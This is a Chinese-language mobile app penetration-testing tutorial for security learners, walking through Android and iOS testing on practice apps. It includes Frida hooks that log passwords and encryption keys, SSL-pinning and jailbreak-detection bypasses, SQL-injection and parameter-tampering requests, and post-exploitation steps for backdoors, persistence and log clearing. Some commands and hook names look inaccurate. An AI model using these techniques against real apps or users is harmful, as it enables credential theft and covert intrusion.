Day-057-移动应用综合实战

# Day 55: 移动应用综合实战

> Web 安全系列第 25 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [综合实战概述](#综合实战概述)
2. [实战环境搭建](#实战环境搭建)
3. [Android 实战演练](#android 实战演练)
4. [iOS 实战演练](#ios 实战演练)
5. [漏洞挖掘实战](#漏洞挖掘实战)
6. [漏洞利用实战](#漏洞利用实战)
7. [后渗透实战](#后渗透实战)
8. [实战案例分析](#实战案例分析)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 综合实战概述

### 实战目标

**学习目标**：
```
1. 综合运用移动安全技术
   - Android 安全测试
   - iOS 安全测试
   - 网络通信测试
   - 数据存储测试

2. 掌握完整渗透流程
   - 信息收集
   - 漏洞发现
   - 漏洞利用
   - 权限提升
   - 报告编写

3. 培养实战思维
   - 攻击者视角
   - 系统性思考
   - 问题解决能力
```

**实战范围**：
```
1. Android 应用
   - APK 反编译
   - 静态分析
   - 动态分析
   - 漏洞利用

2. iOS 应用
   - IPA 分析
   - 静态分析
   - 动态分析
   - 漏洞利用

3. 后端 API
   - API 测试
   - 认证测试
   - 授权测试
   - 数据泄露
```

### 渗透测试流程

**标准流程**：
```
1. 前期交互
   - 确定范围
   - 获取授权
   - 制定计划

2. 信息收集
   - 应用信息
   - 技术栈
   - API 端点

3. 威胁建模
   - 资产识别
   - 威胁分析
   - 攻击面映射

4. 漏洞分析
   - 静态分析
   - 动态分析
   - 漏洞验证

5. 渗透攻击
   - 漏洞利用
   - 权限提升
   - 数据获取

6. 后渗透
   - 数据收集
   - 持久化
   - 痕迹清理

7. 报告编写
   - 发现总结
   - 风险评估
   - 修复建议
```

---

## 实战环境搭建

### Android 测试环境

**设备准备**：
```bash
# 1. 准备测试设备
# - Nexus/Pixel（推荐）
# - 已 Root
# - Android 版本覆盖

# 2. 安装必要工具
adb install frida-server
adb install burp-cert.crt

# 3. 配置代理
# WiFi → 代理 → 手动配置
# 主机：电脑 IP
# 端口：8080
```

**工具安装**：
```bash
# Frida
pip install frida-tools

# Objection
pip install objection

# APKTool
apt install apktool

# JADX
apt install jadx

# MobSF（Docker）
docker pull opensecurity/mobile-security-framework-mobsf
```

### iOS 测试环境

**设备准备**：
```bash
# 1. 准备测试设备
# - iPhone/iPad
# - 已越狱（测试用）
# - iOS 版本覆盖

# 2. 越狱
# - Checkra1n（A5-A11）
# - Unc0ver（A12-A14）
# - Palera1n（A8-A11, iOS 15+）

# 3. 安装必要工具
# - OpenSSH（Cydia）
# - Frida（Cydia）
# - Burp 证书
```

**工具安装**：
```bash
# Frida
pip install frida-tools

# Objection
pip install objection

# class-dump
brew install class-dump

# Hopper（商业）
# 下载安装

# MobSF（Docker）
docker pull opensecurity/mobile-security-framework-mobsf
```

### 靶场应用

**Android 靶场**：
```
1. InsecureBankV2
   - 多种漏洞
   - 适合练习
   - GitHub 开源

2. Android-Insecure-Bankv2
   - 综合漏洞
   - 真实场景
   - 适合进阶

3. DIVA (Damn Insecure and Vulnerable App)
   - 分类漏洞
   - 教学导向
   - 适合入门
```

**iOS 靶场**：
```
1. DVIA (Damn Vulnerable iOS App)
   - 多种漏洞
   - 适合练习
   - GitHub 开源

2. DVIA-v2
   - 更新版本
   - 更多漏洞
   - 适合进阶

3. iGoat
   - OWASP 维护
   - 分类学习
   - 适合入门
```

---

## Android 实战演练

### 信息收集

**应用信息**：
```bash
# 1. 获取包名
adb shell pm list packages | grep example

# 2. 查看应用信息
adb shell dumpsys package com.example.app

# 3. 提取 APK
adb pull /data/app/com.example.app-1/base.apk

# 4. 查看权限
aapt dump permissions app.apk
```

**Manifest 分析**：
```bash
# 反编译
apktool d app.apk

# 查看 Manifest
cat AndroidManifest.xml

# 检查项：
# - 导出组件
# - 权限声明
# - 调试配置
# - 备份设置
```

**网络信息**：
```bash
# 搜索 URL
grep -r "http://" app/
grep -r "https://" app/

# 搜索 IP
grep -rE "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" app/

# 搜索域名
grep -rE "[a-zA-Z0-9-]+\.[a-zA-Z]{2,}" app/
```

### 静态分析

**代码审计**：
```bash
# 反编译代码
jadx -d src app.apk

# 搜索敏感代码
grep -r "password" src/
grep -r "token" src/
grep -r "key" src/
grep -r "secret" src/

# 搜索加密
grep -r "Cipher" src/
grep -r "MessageDigest" src/
grep -r "SecureRandom" src/
```

**硬编码密钥**：
```java
// 查找硬编码密钥
String apiKey = "hardcoded_key";
String secret = "hardcoded_secret";
String password = "hardcoded_password";

// 查找 Base64 编码
String encoded = "YmFzZTY0X2VuY29kZWRfc3RyaW5n";
// 解码后可能是密钥
```

**不安全实现**：
```java
// 弱加密
MessageDigest md = MessageDigest.getInstance("MD5");

// 不安全随机数
Random random = new Random();

// WebView 配置
webView.setJavaScriptEnabled(true);
webView.addJavascriptInterface(obj, "interface");

// 文件操作
FileOutputStream fos = openFileOutput("data.txt", MODE_WORLD_READABLE);
```

### 动态分析

**Frida Hook**：
```javascript
// Hook 登录函数
Java.perform(function() {
    var LoginActivity = Java.use("com.example.LoginActivity");
    
    LoginActivity.login.implementation = function(username, password) {
        console.log("Login called");
        console.log("Username: " + username);
        console.log("Password: " + password);
        
        // 修改密码
        return this.login(username, "bypassed");
    };
});
```

**加密函数 Hook**：
```javascript
// Hook 加密
Java.perform(function() {
    var Cipher = Java.use("javax.crypto.Cipher");
    
    Cipher.doFinal.implementation = function(data) {
        console.log("Encrypt: " + bytesToHex(data));
        var result = this.doFinal(data);
        console.log("Result: " + bytesToHex(result));
        return result;
    };
    
    // Hook 解密
    Cipher.doFinal_1.implementation = function(data) {
        console.log("Decrypt: " + bytesToHex(data));
        var result = this.doFinal_1(data);
        console.log("Result: " + bytesToHex(result));
        return result;
    };
});
```

**证书绑定绕过**：
```javascript
// 通用 SSL Pinning 绕过
Java.perform(function() {
    var TrustManagerImpl = Java.use("com.android.org.conscrypt.TrustManagerImpl");
    
    TrustManagerImpl.verifyChain.implementation = function(untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
        console.log("SSL Pinning bypassed");
        return untrustedChain;
    };
    
    var CertificatePinner = Java.use("okhttp3.CertificatePinner");
    
    CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function() {
        console.log("Certificate pinner bypassed");
        return;
    };
});
```

### 组件测试

**Activity 测试**：
```bash
# 启动导出 Activity
adb shell am start -n com.example.app/.MainActivity

# 传递 Intent
adb shell am start -n com.example.app/.MainActivity --extra admin true

# 查看 Activity
dumpsys activity | grep -i "run"
```

**Service 测试**：
```bash
# 启动导出 Service
adb shell am startservice -n com.example.app/.BackgroundService

# 传递数据
adb shell am startservice -n com.example.app/.BackgroundService --extra command sensitive
```

**BroadcastReceiver 测试**：
```bash
# 发送广播
adb shell am broadcast -a com.example.app.CUSTOM_ACTION --extra data sensitive
```

**ContentProvider 测试**：
```bash
# 查询 Provider
adb shell content query --uri content://com.example.app.provider/data

# 插入数据
adb shell content insert --uri content://com.example.app.provider/data --bind column:s:value

# SQL 注入测试
adb shell content query --uri "content://com.example.app.provider/data?id=1 OR 1=1"
```

---

## iOS 实战演练

### 信息收集

**应用信息**：
```bash
# 1. 获取应用信息
# - 使用 iMazing
# - 提取 IPA
# - 查看 Info.plist

# 2. 查看描述文件
security cms -D -i embedded.mobileprovision

# 3. 查看权限
# Info.plist 中的权限描述
```

**IPA 分析**：
```bash
# 解压 IPA
unzip app.ipa

# 查看 Info.plist
cat Payload/app.app/Info.plist

# 查看二进制
otool -l Payload/app.app/app

# 查看字符串
strings Payload/app.app/app | grep -i "key\|secret\|password"
```

**网络信息**：
```bash
# 搜索 URL
strings app | grep -E "http://|https://"

# 搜索域名
strings app | grep -E "[a-zA-Z0-9-]+\.[a-zA-Z]{2,}"

# 搜索 IP
strings app | grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
```

### 静态分析

**代码反编译**：
```bash
# 导出头文件
class-dump -H app > headers.txt

# 搜索敏感类
grep -i "auth\|login\|crypto" headers.txt

# 查看方法
grep -A 5 "- (void)login" headers.txt
```

**二进制分析**：
```bash
# 查看架构
lipo -info app

# 查看加载命令
otool -l app

# 查看符号
nm app

# 检查加密
otool -l app | grep crypt
```

**代码审计**：
```
检查项：
1. 硬编码密钥
   - 搜索字符串
   - 搜索 Base64
   - 搜索 URL

2. 加密实现
   - 加密算法
   - 密钥管理
   - 加密模式

3. 不安全 API
   - 危险函数
   - 已弃用 API
   - 自定义实现
```

### 动态分析

**Frida Hook**：
```javascript
// Hook Objective-C 方法
Interceptor.attach(ObjC.classes.LoginViewController["- login:password:"].implementation, {
    onEnter: function(args) {
        console.log("Login called");
        console.log("Username: " + ObjC.Object(args[2]).toString());
        console.log("Password: " + ObjC.Object(args[3]).toString());
    }
});

// Hook 加密
var CCCrypt = Module.findExportByName("libSystem.B.dylib", "CCCrypt");

Interceptor.attach(CCCrypt, {
    onEnter: function(args) {
        console.log("CCCrypt called");
        console.log("Operation: " + args[0].toInt32());
        console.log("Key: " + args[2].readUtf8String());
    }
});
```

**越狱检测绕过**：
```javascript
// 文件检测绕过
var fileExists = Module.findExportByName("libSystem.B.dylib", "stat");

Interceptor.attach(fileExists, {
    onEnter: function(args) {
        var path = args[0].readUtf8String();
        if (path.includes("Cydia") || path.includes("MobileSubstrate")) {
            console.log("Blocking file check: " + path);
            this.shouldBlock = true;
        }
    },
    onLeave: function(retval) {
        if (this.shouldBlock) {
            retval.replace(-1);
        }
    }
});

// URL Scheme 绕过
var canOpenURL = ObjC.classes.UIApplication["- canOpenURL:"];

Interceptor.attach(canOpenURL.implementation, {
    onEnter: function(args) {
        var url = ObjC.Object(args[2]).toString();
        if (url.includes("cydia")) {
            console.log("Blocking URL Scheme: " + url);
            this.shouldBlock = true;
        }
    },
    onLeave: function(retval) {
        if (this.shouldBlock) {
            retval.replace(ptr(0));
        }
    }
});
```

**SSL Pinning 绕过**：
```javascript
// 通用 SSL Pinning 绕过
var SSLSetSessionOption = Module.findExportByName("Security", "SSLSetSessionOption");

Interceptor.attach(SSLSetSessionOption, {
    onEnter: function(args) {
        console.log("SSL Pinning bypassed");
    }
});

// 或使用 Objection
objection explore
ios ssl pinning disable
```

### Keychain 测试

**数据提取**：
```bash
# 使用 Keychain-Dumper（需要越狱）
# 提取所有 Keychain 项

# 使用 Frida
frida -U -f com.example.app -l keychain_dump.js
```

**安全检查**：
```
检查项：
1. 明文存储
   - 凭证明文
   - Token 明文
   - 敏感数据明文

2. 访问控制
   - kSecAttrAccessible
   - 访问级别
   - 设备绑定

3. 同步设置
   - iCloud 同步
   - 跨设备访问
```

---

## 漏洞挖掘实战

### 认证漏洞

**硬编码凭证**：
```
发现方式：
1. 静态分析
   - 搜索字符串
   - 反编译代码
   - 二进制分析

2. 动态分析
   - Hook 认证函数
   - 查看网络请求
   - 查看日志

利用方式：
1. 直接使用凭证
2. 绕过认证
3. 提升权限
```

**会话管理**：
```
发现方式：
1. Token 存储
   - SharedPreferences
   - Keychain
   - UserDefaults

2. Token 传输
   - HTTP Header
   - URL 参数
   - Cookie

3. Token 验证
   - 过期检查
   - 签名验证
   - 刷新机制

利用方式：
1. Token 窃取
2. Token 重用
3. Token 伪造
```

### 授权漏洞

**越权访问**：
```
发现方式：
1. API 测试
   - 修改用户 ID
   - 修改资源 ID
   - 遍历访问

2. 组件测试
   - Activity 导出
   - Service 导出
   - Provider 导出

利用方式：
1. 水平越权
   - 访问他人数据
   - 修改他人数据

2. 垂直越权
   - 执行管理员操作
   - 提升权限
```

**业务逻辑漏洞**：
```
发现方式：
1. 流程分析
   - 正常流程
   - 异常流程
   - 边界条件

2. 参数测试
   - 修改金额
   - 修改数量
   - 修改状态

利用方式：
1. 价格篡改
2. 数量篡改
3. 状态绕过
```

### 数据泄露

**不安全存储**：
```
发现方式：
1. 文件检查
   - SharedPreferences
   - Keychain
   - 文件系统

2. 数据库检查
   - SQLite
   - CoreData
   - Realm

利用方式：
1. 数据提取
2. 凭证窃取
3. 隐私泄露
```

**不安全通信**：
```
发现方式：
1. 网络抓包
   - HTTP 流量
   - HTTPS 流量
   - WebSocket

2. 证书检查
   - 证书验证
   - 证书绑定
   - 证书有效性

利用方式：
1. 中间人攻击
2. 数据窃取
3. 请求篡改
```

---

## 漏洞利用实战

### 组件利用

**Activity 劫持**：
```java
// 启动导出 Activity
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.example.app", "com.example.app.AdminActivity"));
intent.putExtra("admin", true);
startActivity(intent);

// 绕过认证
intent.putExtra("authenticated", true);
```

**Service 利用**：
```java
// 调用导出 Service
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.example.app", "com.example.app.BackgroundService"));
intent.putExtra("command", "sensitive_operation");
startService(intent);
```

**ContentProvider 利用**：
```java
// 查询数据
Uri uri = Uri.parse("content://com.example.app.provider/users");
Cursor cursor = getContentResolver().query(uri, null, null, null, null);

// SQL 注入
Uri uri = Uri.parse("content://com.example.app.provider/users?id=1 OR 1=1");
Cursor cursor = getContentResolver().query(uri, null, null, null, null);
```

### API 利用

**未授权访问**：
```bash
# 移除 Token
curl http://target.com/api/users

# 修改 Token
curl -H "Authorization: Bearer modified_token" http://target.com/api/users

# 越权访问
curl -H "Authorization: Bearer valid_token" http://target.com/api/users/123
```

**参数篡改**：
```bash
# 修改金额
curl -X POST http://target.com/api/transfer \
  -H "Authorization: Bearer token" \
  -d "amount=1000000"

# 修改用户 ID
curl http://target.com/api/users/123 \
  -H "Authorization: Bearer token"
```

### 代码执行

**WebView 利用**：
```javascript
// 如果 JavaScript 启用
webView.setJavaScriptEnabled(true);

// 注入 JavaScript
webView.loadUrl("javascript:alert(document.cookie)");

// 如果 addJavascriptInterface 启用
webView.addJavascriptInterface(obj, "interface");
// 可执行 Java 代码
```

**文件包含**：
```
如果文件路径可控：
- 路径遍历
- 文件读取
- 代码执行

利用方式：
1. 读取敏感文件
2. 包含恶意文件
3. 代码执行
```

---

## 后渗透实战

### 数据收集

**凭证收集**：
```
收集位置：
1. SharedPreferences
2. Keychain
3. 数据库
4. 配置文件
5. 日志文件

收集内容：
1. 登录凭证
2. API Token
3. 加密密钥
4. 个人信息
```

**数据提取**：
```bash
# Android
adb shell
su
cd /data/data/com.example.app
tar -czf data.tar.gz *

# iOS（越狱）
ssh root@device
cd /var/mobile/Containers/Data/Application/
tar -czf data.tar.gz *
```

### 持久化

**后门植入**：
```
Android:
1. 修改应用
2. 添加后门代码
3. 重签名安装

iOS:
1. 修改 IPA
2. 添加后门代码
3. 重签名安装
```

**权限维持**：
```
Android:
1. 设备管理员
2. 辅助功能
3. 通知监听

iOS:
1. 描述文件
2. VPN 配置
3. 证书安装
```

### 痕迹清理

**日志清理**：
```bash
# Android
adb logcat -c

# iOS
# 删除日志文件
# 清理缓存
```

**文件清理**：
```bash
# 删除临时文件
# 清理缓存
# 删除工具
```

---

## 实战案例分析

### 案例 1: 电商 App 渗透

**目标**：
```
某电商 App
目标：获取管理员权限
范围：Android/iOS 应用
```

**攻击流程**：
```
1. 信息收集
   - 反编译 APK/IPA
   - 分析 Manifest/Info.plist
   - 搜索敏感信息

2. 漏洞发现
   - 硬编码 API 密钥
   - 不安全的 API
   - 导出组件

3. 漏洞利用
   - 使用 API 密钥
   - 越权访问 API
   - 获取管理员权限

4. 数据收集
   - 用户数据
   - 订单数据
   - 支付信息
```

### 案例 2: 银行 App 渗透

**目标**：
```
某银行 App
目标：获取用户凭证
范围：Android/iOS 应用
```

**攻击流程**：
```
1. 信息收集
   - 反编译应用
   - 分析代码
   - 网络抓包

2. 漏洞发现
   - SSL Pinning
   - 证书绑定
   - 加密实现

3. 漏洞利用
   - 绕过 SSL Pinning
   - 中间人攻击
   - 窃取凭证

4. 权限提升
   - 使用凭证
   - 访问账户
   - 转账操作
```

---

## 总结与思考

### 核心要点回顾

1. **实战流程**
   - 信息收集
   - 漏洞挖掘
   - 漏洞利用
   - 后渗透

2. **工具使用**
   - Frida
   - Objection
   - Burp Suite
   - MobSF

3. **实战思维**
   - 攻击者视角
   - 系统性思考
   - 问题解决

### 深入思考问题

1. **自动化 vs 手工**？
   - 自动化效率高
   - 手工发现深
   - 如何平衡

2. **道德与法律**？
   - 授权范围
   - 负责任披露
   - 法律风险

3. **持续学习**？
   - 新技术
   - 新漏洞
   - 新工具

### 实战建议

**初学者**：
1. 搭建靶场练习
2. 学习基础知识
3. 参加 CTF 比赛
4. 阅读 Writeup

**进阶者**：
1. 参与众测项目
2. 研究新漏洞
3. 开发工具
4. 分享经验

**专业人士**：
1. 保持学习
2. 遵守道德
3. 负责任披露
4. 培养新人

---

## 参考资料

### 学习资源
- [OWASP MSTG](https://owasp.org/www-project-mobile-security-testing-guide/)
- [OWASP Mobile Top 10](https://owasp.org/www-project-mobile-top-10/)
- [HackTheBox](https://www.hackthebox.com/)

### 工具资源
- [Frida](https://frida.re/)
- [Objection](https://github.com/sensepost/objection)
- [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
- [Burp Suite](https://portswigger.net/burp)

### 书籍推荐
- 《移动安全攻防实战》
- 《Android 安全揭秘》
- 《iOS 安全剖析》
- 《Penetration Testing: A Hands-On Introduction to Hacking》

### 在线资源
- [HackerOne](https://hackerone.com/)
- [Bugcrowd](https://www.bugcrowd.com/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [HackTricks](https://book.hacktricks.xyz/)

---

**标记 明日预告**：Day 56 - 云安全基础

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 55 篇，Web 安全部分第 25 篇，精编版本*